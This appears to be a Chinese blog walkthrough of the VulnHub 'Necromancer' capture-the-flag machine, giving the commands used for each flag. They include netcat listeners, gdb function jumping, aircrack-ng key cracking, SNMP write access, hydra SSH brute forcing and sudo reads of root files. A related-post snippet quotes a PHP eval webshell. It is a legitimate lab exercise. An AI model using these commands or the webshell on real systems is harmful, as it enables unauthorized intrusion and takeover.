vulnhub Necromancer wp
flag1
nmap -sU -T4 192.168.220.130
有666端口
nc -nvu 192.168.220.130 666
监听回显消息
tcpdump host 192.168.220.130
抓包查看发现有到4444端口的流量
nc -nvlp 4444
监听发现字符串,解码后得到flag1
flag2
根据flag1的解码字符串提示,在监听666端口时输入opensesame,得到flag2
flag3
访问80端口,下载图片binwalk查看,是个压缩包,dd或者直接改后缀名解压缩,得到flag3
flag4
谷歌搜索提示magic items wiki将网站内容制作为字典爆破目录(连不上google失败),得到tailsman文件
cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v
修改权限为777,执行没有结果
debug
gdb ./tailsman
info functions
break wearTalisman #穿衣服时打断点
run
jump chantToBreakSpell #跳到断点,得到flag4
flag5
flag4为md5,解密为blackmagic,根据flag监听31337
nc -nvu 192.168.220.130 31337
输入blackmagic得到flag5
flag6
flag5提示/thenecromancerwillabsorbyoursoul/
访问得到flag6
flag7
thenecromancerwillabsorbyoursoul界面的图片链接点击后下载得到压缩包,解压后为pcap,协议为802.11,所以是无线网络
aircrack-ng破解
aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt
得到key death2all
snmp-check -c death2all -v 1 -t 1 192.168.220.130 #查看到flag7
snmpwalk -v 2c -c death2allrw 192.168.220.130 #查看OID
snmpset -c death2allrw -v 1 192.168.220.130 iso.3.6.1.2.1.1.6.0 s Unlocked #根据OID解锁
snmp-check -c death2all -v 1 192.168.220.130
flag8、9、10
flag7的md5为demonslayer,且显示22端口,尝试爆破密码
hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 192.168.220.130 ssh
得到密码12345678,ssh连接有个flag8文件
根据提示监听777端口
nc -u localhost 777
,敲击回车两次,之后根据谷歌得到的答案回答得到flag8、9、10
flag11
ctrk+c返回,ls -al查看有.smallvile文件,打开没有线索
sudo -l查看有/bin/cat 和/root/flag11.txt
执行sudo /bin/cat /root/flag11.txt
,结束
vulnhub Necromancer wp的更多相关文章
- Vulnhub 靶场 Os-hackNos WP
About Os-hackNos 描述 Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learn ...
- Vulnhub 靶场 Dijnn WP
About djinn: 1 描述 难度级别:中等 Flag:user.txt和root.txt 说明:该计算机是VirtualBox以及VMWare兼容的.DHCP将自动分配IP.您将在登录屏幕上看 ...
- Vulnhub靶场DC-1 WP
前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...
- Vulnhub靶场 DC-2 WP
DC-2简介 描述 与DC-1一样,DC-2是另一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验. 与原始DC-1一样,它在设计时就考虑了初学者. 必须具备Linux技能并熟悉Linux命 ...
- Vulnhub系列——持续更新
vulnhub系列--持续更新 一 · XXE Lab: 1 使用vmware搭建靶机 扫描存活主机 找到目标主机--192.168.1.18 开始扫描目标端口 发现只开了一个80 ...
- vulnhub靶场之LOOZ: 1
准备: 攻击机:虚拟机kali.本机win10. 靶机:looz: 1,下载地址:https://download.vulnhub.com/looz/Looz.zip,下载后直接vbox打开即可. 知 ...
- vulnhub靶场之VULNCMS: 1
准备: 攻击机:虚拟机kali.本机win10. 靶机:VulnCMS: 1,下载地址:https://download.vulnhub.com/vulncms/VulnCMS.ova,下载后直接vb ...
- Vulnhub 靶场 LOOZ: 1
Vulnhub 靶场 LOOZ: 1 前期准备: 靶机地址:https://www.vulnhub.com/entry/looz-1,732/ kali攻击机ip:192.168.147.190 靶机 ...
- 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])
常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...
- wp已死,metro是罪魁祸首!
1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...
随机推荐
- ATL创建的ActiveX实现JS回调
最近公司的产品需要使用ActiveX文件上传.讨论了基本所有的技术,最后还是决定C++搞个ActiveX...但上传的回调费了半天劲,才搞定.代码如下 STDMETHODIMP CFileSelect ...
- DVWA文件上传
Low安全级别: <?php @eval($_POST['cmd']);?> 文本编辑器写入一句话木马,保存并改为php文件. 上传 成功上传,并返回路径 打开菜刀客户端连接 成功连接 反 ...
- 2020-11-26:go中,map的创建流程是什么?
福哥答案2020-11-26: [答案来自此链接:](https://www.bilibili.com/video/BV1Nr4y1w7aa?p=10)源码位于runtime/map.go文件中的ma ...
- sql server 删除带依赖的列 由于一个或多个对象访问此 列
--SELECT * FROM LJEL005H--ALTER TABLE LJEL005H add el_req int default 15 not null --消息 5074,级别 16,状态 ...
- 啊哈C语言案例学习笔记
Hello World #include<stdio.h> /* 技术要点: 初学者在编写程序时,经常会忘记在语句后边添加分号, */ int main() { printf(" ...
- Java的CAS操作
介绍 CAS 技术是为了解决问题而生的,通过 CAS 我们可以以无锁的方式,保证对共享数据进行 "读取 - 修改 - 写回" 操作序列的正确性. CAS 是乐观锁设计思想的实现.C ...
- [NISACTF 2022]bingdundun~
[NISACTF 2022]bingdundun~ 考点 文件上传.Phar://伪协议 一.题目 打开题目,发现是一道文件上传的题目,因为提示了可以压缩包,所以尝试直接上传zip文件,然后利用PHP ...
- jquery页面搜索关键词突出显示
页面搜索关键词突出 // 页面搜索关键词突出 $(function () { $(".list_r").find('span').css({ // 每次搜索开始,先把所有字体颜色恢 ...
- Kubernetes(k8s)定时任务:CronJob
目录 一.系统环境 二.前言 三.Kubernetes CronJob简介 四.kubernetes CronJob和Linux crontab对比 五.CronJob表达式语法 六.创建CronJo ...
- 文盘Rust -- tokio绑定cpu实践
tokio 是 rust 生态中流行的异步运行时框架.在实际生产中我们如果希望 tokio 应用程序与特定的 cpu core 绑定该怎么处理呢?这次我们来聊聊这个话题. 首先我们先写一段简单的多任务 ...